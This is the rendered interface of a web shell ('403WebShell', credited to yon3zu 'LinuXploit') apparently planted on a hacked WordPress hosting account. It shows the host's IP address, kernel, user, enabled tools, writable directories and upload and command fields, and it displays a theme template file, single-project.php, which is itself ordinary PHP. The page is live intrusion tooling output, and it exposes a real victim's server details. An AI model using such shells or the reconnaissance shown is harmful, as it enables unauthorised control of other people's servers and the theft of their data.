Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.226.96.142
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/diixadigital.com/wp-content/themes/meto/templates/custom-posts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/diixadigital.com/wp-content/themes/meto/templates/custom-posts/single-project.php
<?php $allowed_html = wp_kses_allowed_html('post'); ?>

<div class="blog-detail-page project-deta">
<figure>
	<?php if (class_exists('WPmeto_Resizer')) : ?>
		<?php echo wp_kses($img_obj->WPmeto_resize(wp_get_attachment_url(get_post_thumbnail_id(get_the_ID()), 'full'), 1100, 600, true), $allowed_html); ?>
	<?php else : ?>
		<?php the_post_thumbnail('full'); ?>
	<?php endif; ?>

</figure>
<div class="blog-detail-meta">

		<h2><?php the_title(); ?></h2>
		<?php if ($options->get('projects_single_categories')) : ?>
			<div class="pro-cat">
				<span class="pro-title"><?php esc_html_e('Posted In:', 'meto'); ?></span>
				<span>
				<?php $lists = get_the_terms(get_the_ID(), 'project_cat'); ?>
					<?php foreach ($lists as $list) {
    echo wp_kses(meto_set($list, 'name'), true).', ';
}
                    ?>

				</span>
			</div>
		<?php endif; ?>

		<?php the_content(); ?>
		<?php
        $entries = get_post_meta(get_the_ID(), 'project_timng', true);
        if ($entries && $options->get('projectsingle_timing')) {
            ?>

		<div class="opening-hours">
			<?php echo (esc_attr($options->get('projectsingle_timing_title'))) ? '<span>' .esc_attr($options->get('projectsingle_timing_title')).'</span>' : ''; ?>
			<ul>
				<?php foreach ((array) $entries as $key => $entry) {
                ?>
				<li>

					<?php echo (meto_set($entry, 'opening_day')) ? '<span>'.meto_set($entry, 'opening_day') .':</span>' : ''; ?>

					<?php echo (meto_set($entry, 'opening_time')) ? '<p>'.meto_set($entry, 'opening_time') .'</p>' : ''; ?>
				</li>

				<?php
            } ?>
				<?php if ($closed = get_post_meta(get_the_ID(), 'project_closed_day', true)) : ?>
					<li>
						<span><?php echo esc_attr($closed); ?> :</span>
						<i><?php esc_html_e('closed', 'meto'); ?></i>
					</li>
				<?php endif; ?>
			</ul>
		</div>

		<?php
        } ?>


		<?php if ($options->get('projectsingle_post_share') && $options->get('projectsingle_social_share')) : ?>
			<div class="sharing">
				<span><?php esc_html_e('Social Sharing:', 'meto'); ?></span>
				<ul class="share-social">
					<?php if (! empty($options->get('projectsingle_social_share'))) : ?>

						<?php
                        foreach ($options->get('projectsingle_social_share') as $k => $v) {
                            if ($v == '') {
                                continue;
                            } ?>
							<?php do_action('meto_social_share_output', $k); ?>
							<?php
                        } ?>

						<?php endif; ?>
					</ul>
				</div>
			<?php endif; ?>
		</div>
	</div>

Youez - 2016 - github.com/yon3zu
LinuXploit